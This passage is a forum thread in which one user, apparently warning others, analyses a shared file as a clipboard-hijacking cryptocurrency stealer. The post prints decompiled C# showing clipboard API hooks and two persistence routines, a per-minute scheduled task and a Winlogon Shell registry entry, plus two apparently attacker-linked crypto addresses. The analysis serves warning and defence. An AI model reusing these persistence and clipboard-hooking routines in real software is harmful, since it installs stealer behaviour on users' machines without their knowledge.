Thank you so much bre
Closed
#21
Posted 21 March 2020 - 04:23 AM
#23
Posted 21 March 2020 - 06:42 AM
INFECTED INFECTED INFECTED INFECTED
INFECTED INFECTED INFECTED INFECTED
INFECTED INFECTED INFECTED INFECTED
INFECTED INFECTED INFECTED INFECTED
~ The file is not a .NET ASM yet the DLLS are
~ Its a Windows Installer file
~ Requires Admin Privs
~ When extracted two files are presented to us
~ Build.sfx.exe is an Archive
~ Once extracted another file lays within it under the name of "Build.exe"
~ Build.exe is a Banker / Stealer
~ Retrieves Clipbord data and then logs it
~ Renames it self to "WinService.exe" drops in the Userprofile folder
Clipbord WINAPI Imports
[DllImport("User32.dll", CharSet = CharSet.Auto)] private static extern IntPtr SetClipboardViewer(IntPtr hWndNewViewer); // Token: 0x06000018 RID: 24 [DllImport("User32.dll", CharSet = CharSet.Auto)] private static extern bool ChangeClipboardChain(IntPtr hWndRemove, IntPtr hWndNewNext);
~Has Regular Shell Startup and Task Startup so every minute the file will be executed. dubbed as "antikill" very poor malware
Task Startup:
public static void AntiKill() { Process.Start(new ProcessStartInfo { FileName = "schtasks.exe", UseShellExecute = true, CreateNoWindow = false, WindowStyle = ProcessWindowStyle.Hidden, Arguments = "/create /sc MINUTE /mo 1 /tn \"Windows Service\" /tr \"" + Program.Full2 + "\" /f" }); Process.Start(Program.Full2); Process.GetCurrentProcess().Kill(); }
Regular Shell Startup:
public static void StartUp() { RegistryKey registryKey = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"); registryKey.SetValue("Shell", "explorer.exe, " + Program.Full2); try { RegistryKey registryKey2 = Registry.LocalMachine.OpenSubKey("Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", true); registryKey2.SetValue("Shell", "explorer.exe, " + Program.Full2); } catch { } }
~ Has two Crypto Addresses Linked to it
ETHEREUM: 0xD42A2Ab36f2fa44d5994BFC952978A254b18c8a0
BITCOIN: 3KjaxyBz6vW1m7QWYyyDKd1CwVzqtM6nFD
~Looks like only the BTC Stealer action is in play , there is no linking IP Address to send rest of the data to
~ BUILD.exe Scan: https://www.virustot...cf8b3/detection
Send Samples to be looked at
I think you know whats going on
Have a good day
Also bring back the Malicious section ....
#26
Posted 21 March 2020 - 10:00 PM
#27
Posted 22 March 2020 - 03:25 AM
#30
Posted 22 March 2020 - 05:48 AM
Users browsing this thread: